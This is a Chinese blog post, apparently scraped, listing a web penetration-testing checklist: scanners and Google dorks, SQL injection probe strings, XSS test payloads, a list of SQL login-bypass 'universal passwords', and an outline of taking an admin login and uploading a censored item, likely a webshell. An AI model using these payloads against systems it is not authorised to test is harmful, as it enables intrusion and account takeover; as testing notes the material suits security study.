侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

***思路

2023-05-14 星期日 / 0 评论 / 0 点赞 / 77 阅读 / 3127 字

***思路1.WVS扫描器2.目录扫描器3.nmap扫端口google***site:网站域名 inurl:admin 链接是否有id传值:要尝试 sql注入和传参SQL注入如果是整数:?id=79-

.

***思路

1.WVS扫描器

2.目录扫描器

3.nmap扫端口


google***

site:网站域名  inurl:admin


链接是否有id传值:要尝试 sql注入和传参

SQL注入

如果是整数:

?id=79-0

?id=79-1

超过7位的数字,一般都是字符

如果是参数:

?id=abc'%2b'

?id=abc'%2b'a

搜索型方法

2011%' and '%'='       实际情况<%2011% and '%'='%'>

2011%' and '%'='a


跨站:测试双引号是否被过滤

"121

查看源代码是否有"返,121数字是为了方便在源代码中查找。


      如果尖括号被屏蔽可以尝试

      " onkeyup=alert(/xss/);b="

      然后输入a  看是否有弹出


JS交互没有SQL注入 尝试XSS



网站后台

弱密码

万能密码

最短的:‘or’1

'or'='or'

1'or'1'='1--

'or''='

"or=or"

'or''=''or''='

'or'='or'

'or'='1'

'or' '1'='1'

or 'a'='a'

'or'a'='a--

'or'='or'

经验证,'or''=''or''='的效果是最好的!

暴力破解

SQL注入

找回密码功能,查看是否将不同的用户修改密码发送到不同人的地址

登陆成功的情况下查看cookie 是否有防护



后台目录扫描工具:

1.后台登陆地址

2.编辑器

3.找***


nmap:

旁站


常规思路 注入拿到管理密码,登陆后台,上传***

SQL注入另类应用:差异备份


——————————————————————————————

常见漏洞

间接信任***:CSRF URL重定向

dump的东西    文件包含  路径遍历

***用 WVS

安全检测 appscan


上传 CSRF 模块 不安全对象引用是扫不出来的


1.SQL注入

2.XSS

3.上传 前端上传 后端上传

4.CSRF(是在后台登陆的情况下) 资料修改 发布留言 只要可以破坏别人东西的都属于CSRF 如果存在验证码就不用猜了


CSRF防护有两种 验证码和token  可以截包后删除token看是否还可以修改用。


漏洞证明过程

漏洞的修复建议


5.命令执行漏洞

 截包看命令

 struts 2  存在于Java环境

 tomecat

 cgi漏洞   存在于php环境


6. 不安全对象引用

7.URL重定向

8.文件包含  目录遍历

9.模块缺陷 --属于权限绕过的漏洞 (如忘记密码, 校验码什么的  文章编辑)

判断模块

10 目录浏览  本来应该是403的成了200 例如 http://xxx.com/admin 列出相关信息


.

广告 广告

评论区